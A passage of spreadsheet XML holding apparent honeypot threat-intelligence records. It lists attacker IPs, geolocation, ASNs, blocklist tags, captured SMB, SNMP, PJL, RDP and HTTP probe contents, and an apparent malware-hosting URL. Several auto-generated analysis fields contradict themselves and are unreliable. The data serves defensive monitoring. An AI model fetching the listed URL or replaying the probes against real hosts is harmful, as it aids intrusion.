(117.247.51.43,58520)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,59043)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,60183)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,60258)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,61556)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:75f7:332b</t>
  </si>
  <si>
    <t>9581fb6327fa949add848bdb6af7bfeb</t>
  </si>
  <si>
    <t>200.6.91.45</t>
  </si>
  <si>
    <t>http://200.6.91.45:55764/i</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H8&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>35883&amp;&amp;NA&amp;&amp;23</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['spam'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>Paraíba</t>
  </si>
  <si>
    <t>Guarabira</t>
  </si>
  <si>
    <t>3398570</t>
  </si>
  <si>
    <t>-6.85472</t>
  </si>
  <si>
    <t>-35.49</t>
  </si>
  <si>
    <t>270458</t>
  </si>
  <si>
    <t>Agility Telecom</t>
  </si>
  <si>
    <t>Fibra Mais</t>
  </si>
  <si>
    <t>::ffff:c806:5b2d</t>
  </si>
  <si>
    <t>None&amp;&amp;C-U</t>
  </si>
  <si>
    <t>9a4f5f68be10cae06e4034980238d3b7</t>
  </si>
  <si>
    <t>14.140.209.98</t>
  </si>
  <si>
    <t>Mumbai (Dadar West)</t>
  </si>
  <si>
    <t>19.0211</t>
  </si>
  <si>
    <t>72.8305</t>
  </si>
  <si>
    <t>4755</t>
  </si>
  <si>
    <t>TATACOMM-AS</t>
  </si>
  <si>
    <t>Tata Communications Limited</t>
  </si>
  <si>
    <t>::ffff:e8c:d162</t>
  </si>
  <si>
    <t>63911d17515fd88ec432e0e879a3aa6e</t>
  </si>
  <si>
    <t>103.70.12.9</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>43714&amp;&amp;23&amp;&amp;NA&amp;&amp;56914</t>
  </si>
  <si>
    <t>Quận Mười Một</t>
  </si>
  <si>
    <t>Quận Mười Một (Binh Tri Dong B)</t>
  </si>
  <si>
    <t>9645084</t>
  </si>
  <si>
    <t>10.7479</t>
  </si>
  <si>
    <t>106.608</t>
  </si>
  <si>
    <t>135932</t>
  </si>
  <si>
    <t>Viet Storage Technology Joint Stock Company</t>
  </si>
  <si>
    <t>HYPERCORE</t>
  </si>
  <si>
    <t>Hypercore Technology Joint Stock Company</t>
  </si>
  <si>
    <t>2023-01-17</t>
  </si>
  <si>
    <t>HYPERCORE-VN</t>
  </si>
  <si>
    <t>::ffff:6746:c09</t>
  </si>
  <si>
    <t>Based on the data, it appears that an attacker is attempting to scan and exploit various services on a network, likely for reconnaissance or malicious purposes. &amp;&amp; No log data provided to analyze. &amp;&amp; There is insufficient log data to analyze for possible malicious activity. No notable patterns or anomalies are detected from this information. No evidence of suspicious behavior or threats is present in the given data.</t>
  </si>
  <si>
    <t>The attacker seems to be trying to identify vulnerabilities in different protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is also trying to authenticate with valid credentials on some services.</t>
  </si>
  <si>
    <t>28e1d3cc9d0c19064a04228284ab1131</t>
  </si>
  <si>
    <t>117.193.230.236</t>
  </si>
  <si>
    <t>::ffff:75c1:e6ec</t>
  </si>
  <si>
    <t>This indicates an attempt to connect to a telnet service, likely as part of a reconnaissance or brute-force attack.
The attacker is probing for vulnerabilities in the service's authentication mechanisms.
No further action was taken, suggesting the connection attempt was not successful. &amp;&amp; No TELNET activity detected, but this could be an attempt to exploit the service as there is no connection established or logged. This lack of activity might indicate that an attacker was trying to establish a session but failed to do so.</t>
  </si>
  <si>
    <t>12eff6905f6ca29b44afd791073159fd</t>
  </si>
  <si>
    <t>194.187.176.83</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Email Spoofing&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SNMP_H47</t>
  </si>
  <si>
    <t>3306&amp;&amp;161&amp;&amp;445&amp;&amp;443&amp;&amp;3389&amp;&amp;80&amp;&amp;NA&amp;&amp;110</t>
  </si>
  <si>
    <t>2005-09-07</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA&amp;&amp;command</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SMB:Incoming connection (194.187.176.83,7998)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '156.244.37.11', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '95.164.118.29', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SNMP:NA}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b053</t>
  </si>
  <si>
    <t>A possible attempt to initiate an SSL/TLS connection to test for vulnerabilities or gain unauthorized access. This could be part of a reconnaissance activity before attempting other malicious actions. It may also be a probing attempt to identify services with weak TLS configurations. &amp;&amp; The attacker is attempting to initiate an encrypted connection with a POP3 server, possibly trying to mask their activity or gain unauthorized access. This could be a step towards stealing sensitive email credentials. It may also indicate a reconnaissance phase before actual data exfiltration. &amp;&amp; There is insufficient information for analysis as there are no log entries provided.</t>
  </si>
  <si>
    <t>TLS Attack &amp;&amp; SSL Scan</t>
  </si>
  <si>
    <t>bae08a2dd27b0e9c4f376852a5ed90da</t>
  </si>
  <si>
    <t>101.36.97.187</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_RDP_H13&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MYSQL_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;33867&amp;&amp;21&amp;&amp;22&amp;&amp;3389&amp;&amp;3306&amp;&amp;48594&amp;&amp;59554&amp;&amp;443&amp;&amp;8443&amp;&amp;25&amp;&amp;1080&amp;&amp;39617&amp;&amp;6379&amp;&amp;54151&amp;&amp;55315&amp;&amp;NA&amp;&amp;1433&amp;&amp;161&amp;&amp;143&amp;&amp;9100&amp;&amp;110&amp;&amp;5432&amp;&amp;23</t>
  </si>
  <si>
    <t>Ucloud Information Technology</t>
  </si>
  <si>
    <t>login&amp;&amp;NA&amp;&amp;connection&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:6524:61bb</t>
  </si>
  <si>
    <t>No analysis can be performed without log data.</t>
  </si>
  <si>
    <t>a7cc05d35a980f78f9c3ac9caa4d632f</t>
  </si>
  <si>
    <t>185.180.141.13</t>
  </si>
  <si>
    <t>zl-dala-us-gp1-wk121b.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_DNS_H17&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;21&amp;&amp;6379&amp;&amp;53&amp;&amp;19529&amp;&amp;6667&amp;&amp;NA&amp;&amp;161&amp;&amp;29419&amp;&amp;110&amp;&amp;9100&amp;&amp;389&amp;&amp;443&amp;&amp;23&amp;&amp;1521&amp;&amp;143&amp;&amp;24261&amp;&amp;38379&amp;&amp;29814</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;NA&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CHKO0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8d0d</t>
  </si>
  <si>
    <t>dfb601cfc97229feda81b459c2628225</t>
  </si>
  <si>
    <t>59.184.48.183</t>
  </si>
  <si>
    <t>::ffff:3bb8:30b7</t>
  </si>
  <si>
    <t>76a70eea35758ba8848550cd6021363e</t>
  </si>
  <si>
    <t>117.215.133.213</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>23&amp;&amp;51412&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:75d7:85d5</t>
  </si>
  <si>
    <t>578bb5831660103490f6ed377cb11cc4</t>
  </si>
  <si>
    <t>42.117.149.128</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>Láng Thượng</t>
  </si>
  <si>
    <t>12808882</t>
  </si>
  <si>
    <t>21.0237</t>
  </si>
  <si>
    <t>105.804</t>
  </si>
  <si>
    <t>FPTDYNAMICIP</t>
  </si>
  <si>
    <t>2011-02-10</t>
  </si>
  <si>
    <t>::ffff:2a75:9580</t>
  </si>
  <si>
    <t>The system was scanned for potential vulnerabilities, specifically targeting MySQL databases. The scanner likely sent a probe or attempted connection to identify exposed services. No malicious activity occurred as the scan did not result in any further action.</t>
  </si>
  <si>
    <t>bbee45e670dd6375bece18d85878757e</t>
  </si>
  <si>
    <t>133.106.102.37</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>13</t>
  </si>
  <si>
    <t>Tokyo</t>
  </si>
  <si>
    <t>Chiyoda</t>
  </si>
  <si>
    <t>11749713</t>
  </si>
  <si>
    <t>100-8111</t>
  </si>
  <si>
    <t>35.6906</t>
  </si>
  <si>
    <t>139.77</t>
  </si>
  <si>
    <t>138384</t>
  </si>
  <si>
    <t>Rakuten Mobile, Inc.</t>
  </si>
  <si>
    <t>RMN</t>
  </si>
  <si>
    <t>::ffff:856a:6625</t>
  </si>
  <si>
    <t>b5314400c34e4dc25ef50d5585adf6a2</t>
  </si>
  <si>
    <t>203.83.11.146</t>
  </si>
  <si>
    <t>SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IMAP_H4</t>
  </si>
  <si>
    <t>1080&amp;&amp;48649&amp;&amp;22&amp;&amp;35565&amp;&amp;110&amp;&amp;143&amp;&amp;NA</t>
  </si>
  <si>
    <t>CN</t>
  </si>
  <si>
    <t>China</t>
  </si>
  <si>
    <t>JS</t>
  </si>
  <si>
    <t>Jiangsu</t>
  </si>
  <si>
    <t>Taizhou Shi</t>
  </si>
  <si>
    <t>Taizhou (Jingjiang Shi)</t>
  </si>
  <si>
    <t>1793505</t>
  </si>
  <si>
    <t>32.0149</t>
  </si>
  <si>
    <t>120.275</t>
  </si>
  <si>
    <t>132883</t>
  </si>
  <si>
    <t>Hong Kong San Ai Net Int'l Limited</t>
  </si>
  <si>
    <t>Jiangsu Sanai network science and technology co, LTD</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}</t>
  </si>
  <si>
    <t>::ffff:cb53:b92</t>
  </si>
  <si>
    <t>de87d45b3cb796b4ebb9281e46ecbb1e</t>
  </si>
  <si>
    <t>157.20.189.18</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24</t>
  </si>
  <si>
    <t>Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Ngaglik Timur</t>
  </si>
  <si>
    <t>7036672</t>
  </si>
  <si>
    <t>-7.12184</t>
  </si>
  <si>
    <t>112.415</t>
  </si>
  <si>
    <t>Dinas Komunikasi dan Informatika Kabupaten Lamongan</t>
  </si>
  <si>
    <t>2024-03-09</t>
  </si>
  <si>
    <t>IDNIC-LAMONGANKAB-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,64987)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,65306)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,62343)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,62882)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,57235)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,54240)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,59212)}&amp;&amp;{Data_SMB:Incoming connection (157.20.189.18,61127)}</t>
  </si>
  <si>
    <t>::ffff:9d14:bd12</t>
  </si>
  <si>
    <t>A potential malicious SMB client has connected to an exposed service, attempting unauthorized access from IP address 157.20.189.18 using an unusual source port of 61127. This could be a reconnaissance or attack attempt. The unusual port number suggests the activity may not be legitimate. &amp;&amp; Incoming SMB connection attempt from IP address 157.20.189.18 on port 61127 may be a scanning or reconnaissance activity trying to exploit vulnerabilities in network services. This could be an initial step for potential data exfiltration or further malicious actions. The unknown client's presence suggests suspicious intent.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; SMB Brute Force</t>
  </si>
  <si>
    <t>e9e97cfbdd386b01235bc776b8bcb8b3</t>
  </si>
  <si>
    <t>103.249.26.62</t>
  </si>
  <si>
    <t>Bārdoli</t>
  </si>
  <si>
    <t>1277022</t>
  </si>
  <si>
    <t>21.123</t>
  </si>
  <si>
    <t>73.1115</t>
  </si>
  <si>
    <t>132761</t>
  </si>
  <si>
    <t>Smartlink-AS-IN</t>
  </si>
  <si>
    <t>Smartlink Solutions</t>
  </si>
  <si>
    <t>::ffff:67f9:1a3e</t>
  </si>
  <si>
    <t>e5cb669563633c246a881770560bcb0f</t>
  </si>
  <si>
    <t>60.251.194.108</t>
  </si>
  <si>
    <t>NA&amp;&amp;60-251-194-108.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>::ffff:3cfb:c26c</t>
  </si>
  <si>
    <t>4f8a55733224d90d85b41a25585a22d3</t>
  </si>
  <si>
    <t>45.168.20.87</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;58868&amp;&amp;NA</t>
  </si>
  <si>
    <t>Suzano</t>
  </si>
  <si>
    <t>3447212</t>
  </si>
  <si>
    <t>-23.5425</t>
  </si>
  <si>
    <t>-46.3108</t>
  </si>
  <si>
    <t>268051</t>
  </si>
  <si>
    <t>NEXFIBRA TELECOMUNICACOES LTDA</t>
  </si>
  <si>
    <t>Nexfibra Telecomunicacoes Ltda</t>
  </si>
  <si>
    <t>::ffff:2da8:1457</t>
  </si>
  <si>
    <t>No suspicious activity detected, as Telnet connections are being ignored or blocked. This may be due to a security feature intentionally rejecting incoming Telnet traffic. &amp;&amp; Unknown connection attempt to a telnet service. No malicious activity detected as telnet data is unavailable. This could be a benign or failed login attempt. &amp;&amp; No log data provided, unable to analyze malicious activity.</t>
  </si>
  <si>
    <t>Telnet Scan</t>
  </si>
  <si>
    <t>27ccec6e9d139eeecaf326b138985ae4</t>
  </si>
  <si>
    <t>45.226.5.18</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_DNS_H16&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;50355&amp;&amp;53&amp;&amp;27237&amp;&amp;NA&amp;&amp;23&amp;&amp;4645&amp;&amp;49430</t>
  </si>
  <si>
    <t>::ffff:2de2:512</t>
  </si>
  <si>
    <t>6113f20188f568902c0923f50d7b705c</t>
  </si>
  <si>
    <t>192.140.64.36</t>
  </si>
  <si>
    <t>NA&amp;&amp;192-140-64-36.wtdtelecom-ba.com.br</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MSSQL_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;NA&amp;&amp;445&amp;&amp;56037&amp;&amp;41951</t>
  </si>
  <si>
    <t>Casa Nova Municipality</t>
  </si>
  <si>
    <t>Casa Nova</t>
  </si>
  <si>
    <t>3402621</t>
  </si>
  <si>
    <t>-9.17419</t>
  </si>
  <si>
    <t>-40.9751</t>
  </si>
  <si>
    <t>266550</t>
  </si>
  <si>
    <t>WTD TELECOM</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52273)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57946)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,58093)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53552)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53735)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,62455)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,62634)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52203)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52589)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,54528)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,54675)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,61382)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,56954)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57099)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53169)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53797)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57369)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57426)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52117)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52243)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,55942)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,56024)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,63242)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,63314)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57669)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57764)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,54927)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,55130)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 